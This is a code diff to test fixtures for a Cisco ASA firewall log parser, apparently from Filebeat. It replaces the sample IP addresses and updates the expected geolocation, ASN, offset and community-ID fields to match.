+Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\USER001) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER001) type 3 code 3
+Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\user@domain.tld) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (user@domain.tld) type 3 code 3
+Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(AD\USER002) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER002) type 3 code 3
 Jan 15 2021 19:12:37: %ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:192.168.0.1/59677(LOCAL\USER001) to OUTSIDE:75.0.0.1/18449 duration 0:00:00
 Jan 15 2021 19:12:37: %ASA-6-302021: Teardown ICMP connection for faddr ff02::1/0 gaddr fe80::2205:baff:fe9d:f637/0 laddr fe80::2205:baff:fe9d:f637/0 type 134 code 0
 Jan 15 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 251933191 for OUTSIDE:fe00::fede:bbe1/62477 (fe00::fede:bbe1/62477) to OUTSIDE:2a03:2880:f253:cb:face:b00c:0:43fe/443 (2a03:2880:f253:cb:face:b00c:0:43fe/443) (soc@danskecommodities.com)
-Jan 15 2021 19:12:37: %ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:81.0.0.1/50120(LOCAL\domain\USER001) to OUTSIDE:181.0.0.1/50120 duration 0:02:05
-Jan 15 2021 19:12:37: %ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:81.0.0.1/50120(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\USER001)
-Jan 15 2021 19:12:37: %ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:81.0.0.1/63790 (82.0.0.1/63790)(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\USER001)
-Jan 15 2021 19:12:37: %ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:81.0.0.1/63790(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\USER001)
-Jan 15 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:81.0.0.1/50120 (82.0.0.1/50120)(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\USER001)
-Jul 29 2021 08:35:29: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 12.12.12.12 and 12.12.12.12 (user= 12.12.12.12) has been deleted.
+Jan 15 2021 19:12:37: %ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:89.160.20.156/50120(LOCAL\domain\USER001) to OUTSIDE:189.160.20.156/50120 duration 0:02:05
+Jan 15 2021 19:12:37: %ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:89.160.20.156/50120(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\USER001)
+Jan 15 2021 19:12:37: %ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:89.160.20.156/63790 (67.43.156.13/63790)(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\USER001)
+Jan 15 2021 19:12:37: %ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:89.160.20.156/63790(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\USER001)
+Jan 15 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:89.160.20.156/50120 (67.43.156.13/50120)(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\USER001)
+Jul 29 2021 08:35:29: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 81.2.69.1452 and 81.2.69.1452 (user= 81.2.69.1452) has been deleted.
diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json
index 50e7be1889e1..65608c192ee3 100644
--- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json
@@ -102,7 +102,7 @@
         ]
     },
     {
-        "@timestamp": "2014-04-15T09:34:34.000-04:00",
+        "@timestamp": "2014-04-15T11:34:34.000-02:00",
         "cisco.asa.destination_interface": "outside",
         "cisco.asa.message_id": "106100",
         "cisco.asa.rule_name": "acl_in",
@@ -1964,7 +1964,7 @@
         ]
     },
     {
-        "@timestamp": "2018-04-15T09:34:34.000-04:00",
+        "@timestamp": "2018-04-15T11:34:34.000-02:00",
         "cisco.asa.destination_interface": "outside",
         "cisco.asa.message_id": "106100",
         "cisco.asa.rule_name": "acl_in",
@@ -3680,24 +3680,24 @@
         "@timestamp": "2021-01-13T19:12:37.000-02:00",
         "cisco.asa.connection_id": "27215708",
         "cisco.asa.destination_interface": "vlan-42",
-        "cisco.asa.mapped_destination_ip": "1.2.3.4",
+        "cisco.asa.mapped_destination_ip": "81.2.69.143",
         "cisco.asa.mapped_destination_port": 80,
-        "cisco.asa.mapped_source_ip": "1.2.3.4",
+        "cisco.asa.mapped_source_ip": "81.2.69.143",
         "cisco.asa.mapped_source_port": 49926,
         "cisco.asa.message_id": "302013",
         "cisco.asa.source_interface": "internet",
         "cisco.asa.source_username": "LOCAL\\username",
         "cisco.asa.termination_user": "username",
-        "destination.address": "1.2.3.4",
-        "destination.geo.city_name": "Moscow",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
         "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7527,
-        "destination.geo.location.lon": 37.6172,
-        "destination.geo.region_iso_code": "RU-MOW",
-        "destination.geo.region_name": "Moscow",
-        "destination.ip": "1.2.3.4",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.port": 80,
         "event.action": "firewall-rule",
         "event.category": [
@@ -3707,7 +3707,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)",
+        "event.original": "%ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.143/49926)(LOCAL\\username) to vlan-42:81.2.69.143/80 (81.2.69.143/80) (username)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -3718,7 +3718,7 @@
         "log.file.path": "sample.log",
         "log.level": "informational",
         "log.offset": 10899,
-        "network.community_id": "1:iwVZPCmO/50L3MVqIW0tC5ED+bg=",
+        "network.community_id": "1:6lxM3TRt46lcfZdd21pElFmogG0=",
         "network.direction": "inbound",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -3728,8 +3728,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "1.2.3.4",
-            "10.2.3.4"
+            "10.2.3.4",
+            "81.2.69.143"
         ],
         "related.user": [
             "username"
@@ -3737,7 +3737,7 @@
         "service.type": "cisco",
         "source.address": "10.2.3.4",
         "source.ip": "10.2.3.4",
-        "source.nat.ip": "1.2.3.4",
+        "source.nat.ip": "81.2.69.143",
         "source.port": 49926,
         "source.user.name": "username",
         "tags": [
@@ -3770,7 +3770,7 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "notification",
-        "log.offset": 11080,
+        "log.offset": 11092,
         "observer.product": "asa",
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
@@ -3799,7 +3799,7 @@
         "@timestamp": "2021-01-13T19:12:37.000-02:00",
         "cisco.asa.connection_id": "195207391",
         "cisco.asa.destination_interface": "OUTSIDE",
-        "cisco.asa.mapped_destination_ip": "81.0.0.1",
+        "cisco.asa.mapped_destination_ip": "89.160.20.156",
         "cisco.asa.mapped_destination_port": 443,
         "cisco.asa.mapped_source_ip": "62.0.0.1",
         "cisco.asa.mapped_source_port": 34534,
@@ -3807,18 +3807,18 @@
         "cisco.asa.source_interface": "OUTSIDE",
         "cisco.asa.source_username": "LOCAL\\USER001",
         "cisco.asa.termination_user": "USER001",
-        "destination.address": "81.0.0.1",
-        "destination.as.number": 15704,
-        "destination.as.organization.name": "Xtra Telecom S.A.",
-        "destination.geo.city_name": "Madrid",
+        "destination.address": "89.160.20.156",
+        "destination.as.number": 29518,
+        "destination.as.organization.name": "Bredband2 AB",
+        "destination.geo.city_name": "Link\u00f6ping",
         "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 40.4143,
-        "destination.geo.location.lon": -3.7016,
-        "destination.geo.region_iso_code": "ES-M",
-        "destination.geo.region_name": "Madrid",
-        "destination.ip": "81.0.0.1",
+        "destination.geo.country_iso_code": "SE",
+        "destination.geo.country_name": "Sweden",
+        "destination.geo.location.lat": 58.4167,
+        "destination.geo.location.lon": 15.6167,
+        "destination.geo.region_iso_code": "SE-E",
+        "destination.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "destination.ip": "89.160.20.156",
         "destination.port": 443,
         "event.action": "firewall-rule",
         "event.category": [
@@ -3828,7 +3828,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\\USER001) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (USER001)",
+        "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\\USER001) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (USER001)",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -3838,8 +3838,8 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "notification",
-        "log.offset": 11220,
-        "network.community_id": "1:80+NOqHrJ3D1YMNcnBpJC7S6Pkg=",
+        "log.offset": 11232,
+        "network.community_id": "1:k/bYSo4xyVOcBd5vnxfeC3/AAzY=",
         "network.direction": "inbound",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -3849,26 +3849,18 @@
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
         "related.ip": [
+            "1.128.3.4",
             "62.0.0.1",
-            "81.0.0.1",
-            "85.0.0.1"
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "85.0.0.1",
-        "source.as.number": 3303,
-        "source.as.organization.name": "Bluewin",
-        "source.geo.city_name": "Kolliken",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "CH",
-        "source.geo.country_name": "Switzerland",
-        "source.geo.location.lat": 47.3388,
-        "source.geo.location.lon": 8.0264,
-        "source.geo.region_iso_code": "CH-AG",
-        "source.geo.region_name": "Aargau",
-        "source.ip": "85.0.0.1",
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.nat.ip": "62.0.0.1",
         "source.nat.port": "34534",
         "source.port": 12312,
@@ -3882,7 +3874,7 @@
         "@timestamp": "2021-01-13T19:12:37.000-02:00",
         "cisco.asa.connection_id": "195207391",
         "cisco.asa.destination_interface": "OUTSIDE",
-        "cisco.asa.mapped_destination_ip": "81.0.0.1",
+        "cisco.asa.mapped_destination_ip": "89.160.20.156",
         "cisco.asa.mapped_destination_port": 443,
         "cisco.asa.mapped_source_ip": "62.0.0.1",
         "cisco.asa.mapped_source_port": 34534,
@@ -3890,18 +3882,18 @@
         "cisco.asa.source_interface": "OUTSIDE",
         "cisco.asa.source_username": "LOCAL\\user@domain.tld",
         "cisco.asa.termination_user": "user@domain.tld",
-        "destination.address": "81.0.0.1",
-        "destination.as.number": 15704,
-        "destination.as.organization.name": "Xtra Telecom S.A.",
-        "destination.geo.city_name": "Madrid",
+        "destination.address": "89.160.20.156",
+        "destination.as.number": 29518,
+        "destination.as.organization.name": "Bredband2 AB",
+        "destination.geo.city_name": "Link\u00f6ping",
         "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 40.4143,
-        "destination.geo.location.lon": -3.7016,
-        "destination.geo.region_iso_code": "ES-M",
-        "destination.geo.region_name": "Madrid",
-        "destination.ip": "81.0.0.1",
+        "destination.geo.country_iso_code": "SE",
+        "destination.geo.country_name": "Sweden",
+        "destination.geo.location.lat": 58.4167,
+        "destination.geo.location.lon": 15.6167,
+        "destination.geo.region_iso_code": "SE-E",
+        "destination.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "destination.ip": "89.160.20.156",
         "destination.port": 443,
         "event.action": "firewall-rule",
         "event.category": [
@@ -3911,7 +3903,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\\user@domain.tld) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (user@domain.tld)",
+        "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\\user@domain.tld) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (user@domain.tld)",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -3921,8 +3913,8 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "notification",
-        "log.offset": 11404,
-        "network.community_id": "1:80+NOqHrJ3D1YMNcnBpJC7S6Pkg=",
+        "log.offset": 11427,
+        "network.community_id": "1:k/bYSo4xyVOcBd5vnxfeC3/AAzY=",
         "network.direction": "inbound",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -3935,26 +3927,18 @@
             "domain.tld"
         ],
         "related.ip": [
+            "1.128.3.4",
             "62.0.0.1",
-            "81.0.0.1",
-            "85.0.0.1"
+            "89.160.20.156"
         ],
         "related.user": [
             "user@domain.tld"
         ],
         "service.type": "cisco",
-        "source.address": "85.0.0.1",
-        "source.as.number": 3303,
-        "source.as.organization.name": "Bluewin",
-        "source.geo.city_name": "Kolliken",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "CH",
-        "source.geo.country_name": "Switzerland",
-        "source.geo.location.lat": 47.3388,
-        "source.geo.location.lon": 8.0264,
-        "source.geo.region_iso_code": "CH-AG",
-        "source.geo.region_name": "Aargau",
-        "source.ip": "85.0.0.1",
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.nat.ip": "62.0.0.1",
         "source.nat.port": "34534",
         "source.port": 12312,
@@ -3970,21 +3954,13 @@
         "cisco.asa.destination_username": "LOCAL\\USER001",
         "cisco.asa.icmp_code": 3,
         "cisco.asa.icmp_type": 3,
-        "cisco.asa.mapped_source_ip": "81.0.0.1",
+        "cisco.asa.mapped_source_ip": "89.160.20.156",
         "cisco.asa.message_id": "302020",
         "cisco.asa.source_username": "USER001",
-        "destination.address": "85.0.0.1",
-        "destination.as.number": 3303,
-        "destination.as.organization.name": "Bluewin",
-        "destination.geo.city_name": "Kolliken",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 47.3388,
-        "destination.geo.location.lon": 8.0264,
-        "destination.geo.region_iso_code": "CH-AG",
-        "destination.geo.region_name": "Aargau",
-        "destination.ip": "85.0.0.1",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
+        "destination.ip": "1.128.3.4",
         "destination.user.name": "USER001",
         "event.action": "flow-expiration",
         "event.category": [
@@ -3994,7 +3970,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\\USER001) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER001) type 3 code 3",
+        "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\\USER001) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER001) type 3 code 3",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4005,32 +3981,32 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "notification",
-        "log.offset": 11604,
+        "log.offset": 11638,
         "network.direction": "inbound",
         "network.protocol": "icmp",
         "observer.product": "asa",
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "81.0.0.1",
-            "85.0.0.1"
+            "1.128.3.4",
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.user.name": "USER001",
         "tags": [
             "cisco-asa",
@@ -4043,21 +4019,13 @@
         "cisco.asa.destination_username": "LOCAL\\user@domain.tld",
         "cisco.asa.icmp_code": 3,
         "cisco.asa.icmp_type": 3,
-        "cisco.asa.mapped_source_ip": "81.0.0.1",
+        "cisco.asa.mapped_source_ip": "89.160.20.156",
         "cisco.asa.message_id": "302020",
         "cisco.asa.source_username": "user@domain.tld",
-        "destination.address": "85.0.0.1",
-        "destination.as.number": 3303,
-        "destination.as.organization.name": "Bluewin",
-        "destination.geo.city_name": "Kolliken",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 47.3388,
-        "destination.geo.location.lon": 8.0264,
-        "destination.geo.region_iso_code": "CH-AG",
-        "destination.geo.region_name": "Aargau",
-        "destination.ip": "85.0.0.1",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
+        "destination.ip": "1.128.3.4",
         "destination.user.domain": "domain.tld",
         "destination.user.name": "user@domain.tld",
         "event.action": "flow-expiration",
@@ -4068,7 +4036,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\\user@domain.tld) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (user@domain.tld) type 3 code 3",
+        "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\\user@domain.tld) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (user@domain.tld) type 3 code 3",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4079,7 +4047,7 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "notification",
-        "log.offset": 11765,
+        "log.offset": 11810,
         "network.direction": "inbound",
         "network.protocol": "icmp",
         "observer.product": "asa",
@@ -4089,25 +4057,25 @@
             "domain.tld"
         ],
         "related.ip": [
-            "81.0.0.1",
-            "85.0.0.1"
+            "1.128.3.4",
+            "89.160.20.156"
         ],
         "related.user": [
             "user@domain.tld"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.user.domain": "domain.tld",
         "source.user.name": "user@domain.tld",
         "tags": [
@@ -4121,21 +4089,13 @@
         "cisco.asa.destination_username": "AD\\USER002",
         "cisco.asa.icmp_code": 3,
         "cisco.asa.icmp_type": 3,
-        "cisco.asa.mapped_source_ip": "81.0.0.1",
+        "cisco.asa.mapped_source_ip": "89.160.20.156",
         "cisco.asa.message_id": "302020",
         "cisco.asa.source_username": "USER002",
-        "destination.address": "85.0.0.1",
-        "destination.as.number": 3303,
-        "destination.as.organization.name": "Bluewin",
-        "destination.geo.city_name": "Kolliken",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 47.3388,
-        "destination.geo.location.lon": 8.0264,
-        "destination.geo.region_iso_code": "CH-AG",
-        "destination.geo.region_name": "Aargau",
-        "destination.ip": "85.0.0.1",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
+        "destination.ip": "1.128.3.4",
         "destination.user.domain": "AD",
         "destination.user.name": "USER002",
         "event.action": "flow-expiration",
@@ -4146,7 +4106,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(AD\\USER002) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER002) type 3 code 3",
+        "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(AD\\USER002) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER002) type 3 code 3",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4157,7 +4117,7 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "notification",
-        "log.offset": 11942,
+        "log.offset": 11998,
         "network.direction": "inbound",
         "network.protocol": "icmp",
         "observer.product": "asa",
@@ -4167,25 +4127,25 @@
             "AD"
         ],
         "related.ip": [
-            "81.0.0.1",
-            "85.0.0.1"
+            "1.128.3.4",
+            "89.160.20.156"
         ],
         "related.user": [
             "USER002"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.user.name": "USER002",
         "tags": [
             "cisco-asa",
@@ -4202,14 +4162,6 @@
         "destination.address": "75.0.0.1",
         "destination.as.number": 7018,
         "destination.as.organization.name": "AT&T Services, Inc.",
-        "destination.geo.city_name": "Carson City",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.1507,
-        "destination.geo.location.lon": -119.7459,
-        "destination.geo.region_iso_code": "US-NV",
-        "destination.geo.region_name": "Nevada",
         "destination.ip": "75.0.0.1",
         "destination.port": 18449,
         "event.action": "flow-expiration",
@@ -4234,7 +4186,7 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 12100,
+        "log.offset": 12167,
         "network.community_id": "1:kOYfvYjW0lZrPxD+ArQ6vDYnS7g=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -4287,7 +4239,7 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 12259,
+        "log.offset": 12326,
         "network.community_id": "1:bHWN9qumWIGMl/MbjgS2bQi/Jsw=",
         "network.iana_number": 1,
         "network.transport": "icmp",
@@ -4318,13 +4270,6 @@
         "cisco.asa.source_interface": "OUTSIDE",
         "cisco.asa.termination_user": "soc@danskecommodities.com",
         "destination.address": "2a03:2880:f253:cb:face:b00c:0:43fe",
-        "destination.as.number": 32934,
-        "destination.as.organization.name": "Facebook, Inc.",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IE",
-        "destination.geo.country_name": "Ireland",
-        "destination.geo.location.lat": 53.0,
-        "destination.geo.location.lon": -8.0,
         "destination.ip": "2a03:2880:f253:cb:face:b00c:0:43fe",
         "destination.port": 443,
         "event.action": "firewall-rule",
@@ -4345,7 +4290,7 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 12425,
+        "log.offset": 12492,
         "network.community_id": "1:lOTrEnVpsUc4jukAUBxF/BkD8jE=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -4374,15 +4319,8 @@
         "cisco.asa.message_id": "305012",
         "cisco.asa.source_interface": "OUTSIDE",
         "cisco.asa.source_username": "LOCAL\\domain\\USER001",
-        "destination.address": "181.0.0.1",
-        "destination.as.number": 7303,
-        "destination.as.organization.name": "Telecom Argentina S.A.",
-        "destination.geo.continent_name": "South America",
-        "destination.geo.country_iso_code": "AR",
-        "destination.geo.country_name": "Argentina",
-        "destination.geo.location.lat": -34.6033,
-        "destination.geo.location.lon": -58.3817,
-        "destination.ip": "181.0.0.1",
+        "destination.address": "189.160.20.156",
+        "destination.ip": "189.160.20.156",
         "destination.port": 50120,
         "event.action": "flow-expiration",
         "event.category": [
@@ -4394,7 +4332,7 @@
         "event.end": "2021-01-15T19:12:37.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:81.0.0.1/50120(LOCAL\\domain\\USER001) to OUTSIDE:181.0.0.1/50120 duration 0:02:05",
+        "event.original": "%ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:89.160.20.156/50120(LOCAL\\domain\\USER001) to OUTSIDE:189.160.20.156/50120 duration 0:02:05",
         "event.severity": 6,
         "event.start": "2021-01-15T21:10:32.000Z",
         "event.timezone": "-02:00",
@@ -4406,8 +4344,8 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 12678,
-        "network.community_id": "1:R7zADbxzUGXOH0O/Hzma4ba6iHU=",
+        "log.offset": 12745,
+        "network.community_id": "1:vXccEuUJmxpSB1JgjEhGeCaR+48=",
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.egress.interface.name": "OUTSIDE",
@@ -4419,25 +4357,25 @@
             "domain"
         ],
         "related.ip": [
-            "181.0.0.1",
-            "81.0.0.1"
+            "189.160.20.156",
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
